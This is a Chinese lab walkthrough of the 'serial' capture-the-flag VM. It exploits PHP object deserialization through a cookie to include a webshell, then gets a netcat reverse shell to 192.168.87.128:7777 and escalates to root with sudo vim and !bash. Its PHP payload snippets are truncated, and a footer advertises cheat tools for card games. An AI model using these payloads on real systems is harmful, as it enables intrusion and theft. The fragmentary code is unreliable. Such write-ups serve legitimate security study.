反序列化靶机serial
创始人
2024-11-15 23:07:20
0

1.创建虚拟机

2.渗透测试过程

探测主机存活(目标主机IP地址)

使用nmap探测主机存活或者使用Kali里的netdicover进行探测

-PS/-PA/-PU/-PY:这些参数即可以探测主机存活,也可以同时进行端口扫描。(例如:-PS,发送TCP SYN包进行主机探测

访问

首先访问80端口 F12查看源代码,那我们查看cookie

O:4:"User":2:{s:10:" User name";s:3:"sk4";s:9:" User wel";O:7:"Welcome":0:{}} o:代表存储的是对象(object),如果传入的是一个数组,那它会变成字母a。 4:表示对象的名称有4个字符。User表示对象名称,刚好是4个字符。 2:表示有2个值 s:表示字符串,数字表示字符串的长度,s:10:" User name"; 

使用工具进行扫描,这里扫到一个/backup/目录

打开查看,是一个zip文件,下载查看,是三个源代码文件

通过代码审计得知,首先index.php文件包含了user.class.php文件,对cookie中的user参数进行了序列化和base64编码,然后user.class.php文件包含了log.class.php,且定义了两个类,分别是Welcome和User,并调用了log.class.php文件中的handler函数。log.class.php文件又定义了Log类和成员变量type_log,且handler函数对变量还进行了文件包含和输出

构造payload

wel = new Log();   } } $obj = new User(); echo base64_encode(serialize($obj)); 

抓包

Get shell

生成一个shell 放在www下9.txt

然后构造payload,尝试读取passwd文件,payload如下 新创建一个1.php在本地的www下 然后 把type_log参数后面记得改成自己上传到本地的一句话木马

wel = new Log();   } } $obj = new User(); echo base64_encode(serialize($obj));

 改为本机的www下的

将生成的64编码放到重放器中

 

输入 rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+192.168.87.128+7777+>/tmp/f

kali监听成功

查看文件,多返回几次上级目录,找到一个txt文件

查看,得到账号密码

远程连接 成功进入

尝试提权,试试sudo vim,进入到命令模式输入!bash

提权成功

相关内容

热门资讯

实测分享!小逸碰胡插件脚本,玩... 实测分享!小逸碰胡插件脚本,玩吧辅助器,练习教程(有挂详情)1、下载好小逸碰胡插件脚本透视辅助下载之...
一分钟揭秘!天酷互娱有辅助工具... 一分钟揭秘!天酷互娱有辅助工具嘛,九九山城万州版辅助,资料教程(有挂技术)1)天酷互娱有辅助工具嘛免...
传递经验!新道游辅助器,反杀新... 传递经验!新道游辅助器,反杀新火神辅助,资料教程(有挂解惑)1、首先打开新道游辅助器辅助器下载最新版...
今日头条!长城互娱辅助,新51... 今日头条!长城互娱辅助,新518互游脚本,模板教程(了解有挂)小薇(辅助器软件下载)致您一封信;亲爱...
科普攻略!哥哥打大a辅助,南丰... 科普攻略!哥哥打大a辅助,南丰数刀脚本,绝活儿教程(有挂技巧)暗藏猫腻,小编详细说明哥哥打大a辅助破...
我来教教你!琼戏互娱破解版,手... 我来教教你!琼戏互娱破解版,手机字牌辅助脚本工具,积累教程(有挂教学)1、操作简单,无需手机字牌辅助...
玩家必看教程!老友广东潮汕麻雀... 玩家必看教程!老友广东潮汕麻雀辅助,小程序卡五星辅助,绝活儿教程(有挂分析)1、任何老友广东潮汕麻雀...
推荐十款!全民牛牛拼三张开挂,... 推荐十款!全民牛牛拼三张开挂,吉祥填大坑脚本,机巧教程(有挂解惑)亲,关键说明,全民牛牛拼三张开挂透...
技术分享!拼三张自建房软件,微... 技术分享!拼三张自建房软件,微信微乐辅助器免费安装,方式教程(有挂存在)1、拼三张自建房软件脚本辅助...
一分钟快速了解!创思维激k软件... 一分钟快速了解!创思维激k软件助手,小闲巴渝辅助,妙计教程(有挂工具)1、金币登录送、破产送、升级送...